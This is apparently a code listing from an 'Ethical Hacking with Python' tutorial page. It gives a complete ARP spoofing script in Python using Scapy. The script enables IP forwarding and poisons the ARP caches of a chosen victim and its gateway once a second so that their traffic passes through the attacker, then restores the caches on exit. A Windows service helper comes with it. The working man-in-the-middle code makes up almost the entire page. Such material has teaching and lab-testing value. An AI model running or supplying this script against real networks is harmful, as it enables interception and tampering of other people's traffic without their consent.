Code for How to Build an ARP Spoofer in Python using Scapy Tutorial

arp_spoof.py

from scapy.all import Ether, ARP, srp, send import argparse import time import os import sys def _enable_linux_iproute(): """ Enables IP route ( IP Forward ) in linux-based distro """ file_path = "/proc/sys/net/ipv4/ip_forward" with open(file_path) as f: if f.read() == 1: # already enabled return with open(file_path, "w") as f: print(1, file=f) def _enable_windows_iproute(): """ Enables IP route (IP Forwarding) in Windows """ from services import WService # enable Remote Access service service = WService("RemoteAccess") service.start() def enable_ip_route(verbose=True): """ Enables IP forwarding """ if verbose: print("[!] Enabling IP Routing...") _enable_windows_iproute() if "nt" in os.name else _enable_linux_iproute() if verbose: print("[!] IP Routing enabled.") def get_mac(ip): """ Returns MAC address of any device connected to the network If ip is down, returns None instead """ ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0) if ans: return ans[0][1].src def spoof(target_ip, host_ip, verbose=True): """ Spoofs `target_ip` saying that we are `host_ip`. it is accomplished by changing the ARP cache of the target (poisoning) """ # get the mac address of the target target_mac = get_mac(target_ip) # craft the arp 'is-at' operation packet, in other words; an ARP response # we don't specify 'hwsrc' (source MAC address) # because by default, 'hwsrc' is the real MAC address of the sender (ours) arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at') # send the packet # verbose = 0 means that we send the packet without printing any thing send(arp_response, verbose=0) if verbose: # get the MAC address of the default interface we are using self_mac = ARP().hwsrc print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac)) def restore(target_ip, host_ip, verbose=True): """ Restores the normal process of a regular network This is done by sending the original informations (real IP and MAC of `host_ip` ) to `target_ip` """ # get the real MAC address of target target_mac = get_mac(target_ip) # get the real MAC address of spoofed (gateway, i.e router) host_mac = get_mac(host_ip) # crafting the restoring packet arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac, op="is-at") # sending the restoring packet # to restore the network to its normal process # we send each reply seven times for a good measure (count=7) send(arp_response, verbose=0, count=7) if verbose: print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac)) if __name__ == "__main__": parser = argparse.ArgumentParser(description="ARP spoof script") parser.add_argument("target", help="Victim IP Address to ARP poison") parser.add_argument("host", help="Host IP Address, the host you wish to intercept packets for (usually the gateway)") parser.add_argument("-v", "--verbose", action="store_true", help="verbosity, default is True (simple message each second)") args = parser.parse_args() target, host, verbose = args.target, args.host, args.verbose enable_ip_route() try: while True: # telling the `target` that we are the `host` spoof(target, host, verbose) # telling the `host` that we are the `target` spoof(host, target, verbose) # sleep for one second time.sleep(1) except KeyboardInterrupt: print("[!] Detected CTRL+C ! restoring the network, please wait...") restore(target, host) restore(host, target)

services.py

import win32serviceutil import time class WService: def __init__(self, service, machine=None, verbose=False): self.service = service self.machine = machine self.verbose = verbose @property def running(self): return win32serviceutil.QueryServiceStatus(self.service)[1] == 4 def start(self): if not self.running: win32serviceutil.StartService(self.service) time.sleep(1) if self.running: if self.verbose: print(f"[+] {self.service} started successfully.") return True else: if self.verbose: print(f"[-] Cannot start {self.service}") return False elif self.verbose: print(f"[!] {self.service} is already running.") def stop(self): if self.running: win32serviceutil.StopService(self.service) time.sleep(0.5) if not self.running: if self.verbose: print(f"[+] {self.service} stopped successfully.") return True else: if self.verbose: print(f"[-] Cannot stop {self.service}") return False elif self.verbose: print(f"[!] {self.service} is not running.") def restart(self): if self.running: win32serviceutil.RestartService(self.service) time.sleep(2) if self.running: if self.verbose: print(f"[+] {self.service} restarted successfully.") return True else: if self.verbose: print(f"[-] Cannot start {self.service}") return False elif self.verbose: print(f"[!] {self.service} is not running.") def main(action, service): service = WService(service, verbose=True) if action == "start": service.start() elif action == "stop": service.stop() elif action == "restart": service.restart() # getattr(remoteAccessService, action, "start")() if __name__ == "__main__": import argparse parser = argparse.ArgumentParser(description="Windows Service Handler") parser.add_argument("service") parser.add_argument("-a", "--action", help="action to do, 'start', 'stop' or 'restart'", action="store", required=True, dest="action") given_args = parser.parse_args() service, action = given_args.service, given_args.action main(action, service)

Ethical Hacking with Python EBook - Author - Top

New Tutorials

Build an MCP Server in Python with FastMCP

Building an AI-Driven HTTP Security Headers Analyzer with Python

Building an Advanced Audiobook Generator with Python and ElevenLabs TTS

Building a Full-Stack RAG Chatbot with FastAPI, OpenAI, and Streamlit

How to Recover Deleted Files with Python

Code for How to Build an ARP Spoofer in Python using Scapy Tutorial

Tags

New Tutorials

Popular Tutorials